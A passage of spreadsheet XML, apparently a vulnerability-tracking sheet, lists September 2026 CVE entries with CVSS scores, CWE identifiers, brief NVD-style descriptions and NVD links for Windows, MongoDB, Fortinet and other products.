s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S821" s="5" t="inlineStr"><is><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is></c><c r="T821" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76561</t></is></c></row><row r="822"><c r="A822" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B822" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C822" s="5" t="inlineStr"><is><t>CVE-2026-81349</t></is></c><c r="D822" s="5" t="n"><v>7.2</v></c><c r="E822" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F822" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G822" s="5" t="inlineStr" /><c r="H822" s="5" t="n"><v>0.007</v></c><c r="I822" s="5" t="inlineStr" /><c r="J822" s="5" t="inlineStr" /><c r="K822" s="5" t="inlineStr" /><c r="L822" s="5" t="inlineStr" /><c r="M822" s="5" t="inlineStr" /><c r="N822" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O822" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P822" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q822" s="5" t="inlineStr" /><c r="R822" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S822" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an os command ('os command injection') in Azure HDInsights allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T822" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81349</t></is></c></row><row r="823"><c r="A823" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B823" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C823" s="5" t="inlineStr"><is><t>CVE-2026-81806</t></is></c><c r="D823" s="5" t="n"><v>7.2</v></c><c r="E823" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F823" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G823" s="5" t="inlineStr" /><c r="H823" s="5" t="n"><v>0.002</v></c><c r="I823" s="5" t="inlineStr" /><c r="J823" s="5" t="inlineStr" /><c r="K823" s="5" t="inlineStr" /><c r="L823" s="5" t="inlineStr" /><c r="M823" s="5" t="inlineStr" /><c r="N823" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O823" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P823" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q823" s="5" t="inlineStr" /><c r="R823" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S823" s="5" t="inlineStr"><is><t>Server-Side Request Forgery (SSRF) vulnerability in John Darrel Hide My WP Ghost allows Server Side Request Forgery.

This issue affects Hide My WP Ghost: from n/a through 7.0.09.</t></is></c><c r="T823" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81806</t></is></c></row><row r="824"><c r="A824" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B824" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C824" s="5" t="inlineStr"><is><t>CVE-2026-82061</t></is></c><c r="D824" s="5" t="n"><v>7.2</v></c><c r="E824" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F824" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G824" s="5" t="inlineStr" /><c r="H824" s="5" t="n"><v>0.003</v></c><c r="I824" s="5" t="inlineStr" /><c r="J824" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K824" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L824" s="5" t="inlineStr" /><c r="M824" s="5" t="inlineStr" /><c r="N824" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O824" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P824" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q824" s="5" t="inlineStr" /><c r="R824" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S824" s="5" t="inlineStr"><is><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is></c><c r="T824" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82061</t></is></c></row><row r="825"><c r="A825" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B825" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C825" s="5" t="inlineStr"><is><t>CVE-2026-82071</t></is></c><c r="D825" s="5" t="n"><v>7.2</v></c><c r="E825" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F825" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G825" s="5" t="inlineStr" /><c r="H825" s="5" t="n"><v>0.003</v></c><c r="I825" s="5" t="inlineStr" /><c r="J825" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K825" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L825" s="5" t="inlineStr" /><c r="M825" s="5" t="inlineStr" /><c r="N825" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O825" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P825" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q825" s="5" t="inlineStr" /><c r="R825" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S825" s="5" t="inlineStr"><is><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is></c><c r="T825" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82071</t></is></c></row><row r="826"><c r="A826" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B826" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C826" s="5" t="inlineStr"><is><t>CVE-2026-84387</t></is></c><c r="D826" s="5" t="n"><v>7.2</v></c><c r="E826" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F826" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G826" s="5" t="inlineStr" /><c r="H826" s="5" t="n"><v>0.008999999999999999</v></c><c r="I826" s="5" t="inlineStr" /><c r="J826" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K826" s="5" t="inlineStr" /><c r="L826" s="5" t="inlineStr" /><c r="M826" s="5" t="inlineStr" /><c r="N826" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O826" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P826" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q826" s="5" t="inlineStr" /><c r="R826" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="S826" s="5" t="inlineStr"><is><t>A improper neutralization of special elements used in a command ('command injection') vulnerability in Fortinet FortiSandbox 5.2.0, FortiSandbox 5.0.0 through 5.0.6, FortiSandbox 4.4.0 through 4.4.9 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t></is></c><c r="T826" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84387</t></is></c></row><row r="827"><c r="A827" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B827" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C827" s="5" t="inlineStr"><is><t>CVE-2026-86733</t></is></c><c r="D827" s="5" t="n"><v>7.2</v></c><c r="E827" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F827" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G827" s="5" t="inlineStr" /><c r="H827" s="5" t="n"><v>0.003</v></c><c r="I827" s="5" t="inlineStr" /><c r="J827" s="5" t="inlineStr" /><c r="K827" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L827" s="5" t="inlineStr" /><c r="M827" s="5" t="inlineStr" /><c r="N827" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O827" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P827" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q827" s="5" t="inlineStr" /><c r="R827" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S827" s="5" t="inlineStr"><is><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is></c><c r="T827" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86733</t></is></c></row><row r="828"><c r="A828" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B828" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C828" s="5" t="inlineStr"><is><t>CVE-2026-11573</t></is></c><c r="D828" s="5" t="n"><v>7.1</v></c><c r="E828" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F828" s="5" t="inlineStr"><is><t>a59d8014-47c4-4630-ab43-e1b13cbe58e3</t></is></c><c r="G828" s="5" t="inlineStr" /><c r="H828" s="5" t="n"><v>0.004</v></c><c r="I828" s="5" t="inlineStr" /><c r="J828" s="5" t="inlineStr" /><c r="K828" s="5" t="inlineStr" /><c r="L828" s="5" t="inlineStr" /><c r="M828" s="5" t="inlineStr" /><c r="N828" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O828" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P828" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q828" s="5" t="inlineStr" /><c r="R828" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="S828" s="5" t="inlineStr"><is><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is></c><c r="T828" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-11573</t></is></c></row><row r="829"><c r="A829" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B829" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C829" s="5" t="inlineStr"><is><t>CVE-2026-16769</t></is></c><c r="D829" s="5" t="n"><v>7.1</v></c><c r="E829" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F829" s="5" t="inlineStr"><is><t>product-security@silabs.com</t></is></c><c r="G829" s="5" t="inlineStr" /><c r="H829" s="5" t="n"><v>0.001</v></c><c r="I829" s="5" t="inlineStr" /><c r="J829" s="5" t="inlineStr" /><c r="K829" s="5" t="inlineStr" /><c r="L829" s="5" t="inlineStr" /><c r="M829" s="5" t="inlineStr" /><c r="N829" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O829" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P829" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q829" s="5" t="inlineStr" /><c r="R829" s="5" t="inlineStr"><is><t>CWE-440</t></is></c><c r="S829" s="5" t="inlineStr"><is><t>An unencrypted 'pause encryption request' message causes a denial of service in the in the RS9116W/SiWx917. See vulnerability B-E10 in the related paper below.</t></is></c><c r="T829" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16769</t></is></c></row><row r="830"><c r="A830" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B830" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C830" s="5" t="inlineStr"><is><t>CVE-2026-20293</t></is></c><c r="D830" s="5" t="n"><v>7.1</v></c><c r="E830" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F830" s="5" t="inlineStr"><is><t>psirt@cisco.com</t></is></c><c r="G830" s="5" t="inlineStr" /><c r="H830" s="5" t="n"><v>0.001</v></c><c r="I830" s="5" t="inlineStr" /><c r="J830" s="5" t="inlineStr"><is><t>cisco</t></is></c><c r="K830" s="5" t="inlineStr" /><c r="L830" s="5" t="inlineStr" /><c r="M830" s="5" t="inlineStr" /><c r="N830" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O830" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P830" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q830" s="5" t="inlineStr" /><c r="R830" s="5" t="inlineStr"><is><t>CWE-749</t></is></c><c r="S830" s="5" t="inlineStr"><is><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is></c><c r="T830" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-20293</t></is></c></row><row r="831"><c r="A831" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B831" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C831" s="5" t="inlineStr"><is><t>CVE-2026-66305</t></is></c><c r="D831" s="5" t="n"><v>7.1</v></c><c r="E831" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F831" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G831" s="5" t="inlineStr" /><c r="H831" s="5" t="n"><v>0.003</v></c><c r="I831" s="5" t="inlineStr" /><c r="J831" s="5" t="inlineStr" /><c r="K831" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L831" s="5" t="inlineStr" /><c r="M831" s="5" t="inlineStr" /><c r="N831" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O831" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P831" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q831" s="5" t="inlineStr" /><c r="R831" s="5" t="inlineStr"><is><t>CWE-603</t></is></c><c r="S831" s="5" t="inlineStr"><is><t>Use of client-side authentication in Skype for Business allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T831" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66305</t></is></c></row><row r="832"><c r="A832" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B832" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C832" s="5" t="inlineStr"><is><t>CVE-2026-68835</t></is></c><c r="D832" s="5" t="n"><v>7.1</v></c><c r="E832" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F832" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G832" s="5" t="inlineStr" /><c r="H832" s="5" t="n"><v>0.005</v></c><c r="I832" s="5" t="inlineStr" /><c r="J832" s="5" t="inlineStr" /><c r="K832" s="5" t="inlineStr" /><c r="L832" s="5" t="inlineStr" /><c r="M832" s="5" t="inlineStr" /><c r="N832" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O832" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P832" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q832" s="5" t="inlineStr" /><c r="R832" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S832" s="5" t="inlineStr"><is><t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T832" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68835</t></is></c></row><row r="833"><c r="A833" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B833" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C833" s="5" t="inlineStr"><is><t>CVE-2026-68846</t></is></c><c r="D833" s="5" t="n"><v>7.1</v></c><c r="E833" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F833" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G833" s="5" t="inlineStr" /><c r="H833" s="5" t="n"><v>0.006</v></c><c r="I833" s="5" t="inlineStr" /><c r="J833" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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33" s="5" t="inlineStr" /><c r="M833" s="5" t="inlineStr" /><c r="N833" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O833" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P833" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q833" s="5" t="inlineStr" /><c r="R833" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S833" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T833" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68846</t></is></c></row><row r="834"><c r="A834" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B834" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C834" s="5" t="inlineStr"><is><t>CVE-2026-68889</t></is></c><c r="D834" s="5" t="n"><v>7.1</v></c><c r="E834" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F834" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G834" s="5" t="inlineStr" /><c r="H834" s="5" t="n"><v>0.004</v></c><c r="I834" s="5" t="inlineStr" /><c r="J834" s="5" t="inlineStr" /><c r="K834" s="5" t="inlineStr" /><c r="L834" s="5" t="inlineStr" /><c r="M834" s="5" t="inlineStr" /><c r="N834" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O834" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P834" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q834" s="5" t="inlineStr" /><c r="R834" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S834" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T834" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68889</t></is></c></row><row r="835"><c r="A835" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B835" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C835" s="5" t="inlineStr"><is><t>CVE-2026-68893</t></is></c><c r="D835" s="5" t="n"><v>7.1</v></c><c r="E835" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F835" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G835" s="5" t="inlineStr" /><c r="H835" s="5" t="n"><v>0.005</v></c><c r="I835" s="5" t="inlineStr" /><c r="J835" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K835" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L835" s="5" t="inlineStr" /><c r="M835" s="5" t="inlineStr" /><c r="N835" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O835" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P835" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q835" s="5" t="inlineStr" /><c r="R835" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S835" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T835" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68893</t></is></c></row><row r="836"><c r="A836" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B836" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C836" s="5" t="inlineStr"><is><t>CVE-2026-69272</t></is></c><c r="D836" s="5" t="n"><v>7.1</v></c><c r="E836" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F836" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G836" s="5" t="inlineStr" /><c r="H836" s="5" t="n"><v>0.004</v></c><c r="I836" s="5" t="inlineStr" /><c r="J836" s="5" t="inlineStr" /><c r="K836" s="5" t="inlineStr" /><c r="L836" s="5" t="inlineStr" /><c r="M836" s="5" t="inlineStr" /><c r="N836" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O836" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P836" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q836" s="5" t="inlineStr" /><c r="R836" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S836" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T836" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69272</t></is></c></row><row r="837"><c r="A837" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B837" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C837" s="5" t="inlineStr"><is><t>CVE-2026-69274</t></is></c><c r="D837" s="5" t="n"><v>7.1</v></c><c r="E837" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F837" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G837" s="5" t="inlineStr" /><c r="H837" s="5" t="n"><v>0.004</v></c><c r="I837" s="5" t="inlineStr" /><c r="J837" s="5" t="inlineStr" /><c r="K837" s="5" t="inlineStr" /><c r="L837" s="5" t="inlineStr" /><c r="M837" s="5" t="inlineStr" /><c r="N837" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O837" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P837" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q837" s="5" t="inlineStr" /><c r="R837" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S837" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T837" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69274</t></is></c></row><row r="838"><c r="A838" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B838" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C838" s="5" t="inlineStr"><is><t>CVE-2026-69296</t></is></c><c r="D838" s="5" t="n"><v>7.1</v></c><c r="E838" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F838" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G838" s="5" t="inlineStr" /><c r="H838" s="5" t="n"><v>0.005</v></c><c r="I838" s="5" t="inlineStr" /><c r="J838" s="5" t="inlineStr" /><c r="K838" s="5" t="inlineStr" /><c r="L838" s="5" t="inlineStr" /><c r="M838" s="5" t="inlineStr" /><c r="N838" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O838" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P838" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q838" s="5" t="inlineStr" /><c r="R838" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S838" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T838" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69296</t></is></c></row><row r="839"><c r="A839" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B839" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C839" s="5" t="inlineStr"><is><t>CVE-2026-69305</t></is></c><c r="D839" s="5" t="n"><v>7.1</v></c><c r="E839" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F839" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G839" s="5" t="inlineStr" /><c r="H839" s="5" t="n"><v>0.006</v></c><c r="I839" s="5" t="inlineStr" /><c r="J839" s="5" t="inlineStr" /><c r="K839" s="5" t="inlineStr" /><c r="L839" s="5" t="inlineStr" /><c r="M839" s="5" t="inlineStr" /><c r="N839" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O839" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P839" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q839" s="5" t="inlineStr" /><c r="R839" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S839" s="5" t="inlineStr"><is><t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T839" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69305</t></is></c></row><row r="840"><c r="A840" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B840" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C840" s="5" t="inlineStr"><is><t>CVE-2026-69313</t></is></c><c r="D840" s="5" t="n"><v>7.1</v></c><c r="E840" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F840" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G840" s="5" t="inlineStr" /><c r="H840" s="5" t="n"><v>0.005</v></c><c r="I840" s="5" t="inlineStr" /><c r="J840" s="5" t="inlineStr" /><c r="K840" s="5" t="inlineStr" /><c r="L840" s="5" t="inlineStr" /><c r="M840" s="5" t="inlineStr" /><c r="N840" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O840" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P840" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q840" s="5" t="inlineStr" /><c r="R840" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S840" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T840" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69313</t></is></c></row><row r="841"><c r="A841" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B841" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C841" s="5" t="inlineStr"><is><t>CVE-2026-69314</t></is></c><c r="D841" s="5" t="n"><v>7.1</v></c><c r="E841" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F841" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G841" s="5" t="inlineStr" /><c r="H841" s="5" t="n"><v>0.005</v></c><c r="I841" s="5" t="inlineStr" /><c r="J841" s="5" t="inlineStr" /><c r="K841" s="5" t="inlineStr" /><c r="L841" s="5" t="inlineStr" /><c r="M841" s="5" t="inlineStr" /><c r="N841" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O841" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P841" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q841" s="5" t="inlineStr" /><c r="R841" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S841" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T841" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69314</t></is></c></row><row r="842"><c r="A842" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B842" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C842" s="5" t="inlineStr"><is><t>CVE-2026-69336</t></is></c><c r="D842" s="5" t="n"><v>7.1</v></c><c r="E842" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F842" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G842" s="5" t="inlineStr" /><c r="H842" s="5" t="n"><v>0.005</v></c><c r="I842" s="5" t="inlineStr" /><c r="J842" s="5" t="inlineStr" /><c r="K842" s="5" t="inlineStr" /><c r="L842" s="5" t="inlineStr" /><c r="M842" s="5" t="inlineStr" /><c r="N842" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O842" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P842" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q842" s="5" t="inlineStr" /><c r="R842" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S842" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T842" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69336</t></is></c></row><row r="843"><c r="A843" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B843" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C843" s="5" t="inlineStr"><is><t>CVE-2026-69337</t></is></c><c r="D843" s="5" t="n"><v>7.1</v></c><c r="E843" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F843" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G843" s="5" t="inlineStr" /><c r="H843" s="5" t="n"><v>0.007</v></c><c r="I843" s="5" t="inlineStr" /><c r="J843" s="5" t="inlineStr" /><c r="K843" s="5" t="inlineStr" /><c r="L843" s="5" t="inlineStr" /><c r="M843" s="5" t="inlineStr" /><c r="N843" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O843" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P843" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q843" s="5" t="inlineStr" /><c r="R843" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S843" s="5" t="inlineStr"><is><t>Double free in Windows Registry allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T843" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69337</t></is></c></row><row r="844"><c r="A844" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B844" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C844" s="5" t="inlineStr"><is><t>CVE-2026-69338</t></is></c><c r="D844" s="5" t="n"><v>7.1</v></c><c r="E844" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F844" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G844" s="5" t="inlineStr" /><c r="H844" s="5" t="n"><v>0.005</v></c><c r="I844" s="5" t="inlineStr" /><c r="J844" s="5" t="inlineStr" /><c r="K844" s="5" t="inlineStr" /><c r="L844" s="5" t="inlineStr" /><c r="M844" s="5" t="inlineStr" /><c r="N844" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O844" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P844" s="5" 